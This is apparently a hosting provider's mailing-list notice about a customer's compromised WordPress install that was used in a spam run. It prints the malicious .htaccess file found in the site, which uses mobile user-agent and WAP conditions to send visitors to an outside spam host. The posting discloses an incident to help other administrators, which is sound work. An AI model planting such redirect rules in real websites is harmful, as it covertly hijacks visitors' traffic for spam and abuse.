[bitfolk] Security incident: Wordpress install compromised a…

Hi,

Yesterday we received numerous abuse reports regarding a web site
hosted at BitFolk being mentioned in an email spam run. The spam
email looked like this:

    http://pastie.org/private/vjxjhjkpfxqby0fkrv87oq

(http://[elided]/wp-content/themes/mantra/uploads/wps.php?v20120226
being the link that was hosted at BitFolk)

The link, when visited from a conventional browser, was a harmless
redirect to microsoft.com, however when visited from a mobile
browser redirected to a porn site.

The customer was contacted and their port 80 immediately firewalled
off.

Later the customer advised that they were unwilling to spend the
time to discover exactly how Wordpress had been compromised,
preferring instead to completely remove it.

The following .htaccess file was found in several places throughout
the wp-content directory:

    RewriteEngine On
    RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
    RewriteCond %{HTTP_USER_AGENT}
    ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$
    [NC,OR]
    RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR]
    RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
    RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302]

The customer says that no plugins were installed, so it must have
been a base Wordpress install that was compromised (may have been
out of date or installed incorrectly).

Cheers,
Andy

About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings

--
http://bitfolk.com/ -- No-nonsense VPS hosting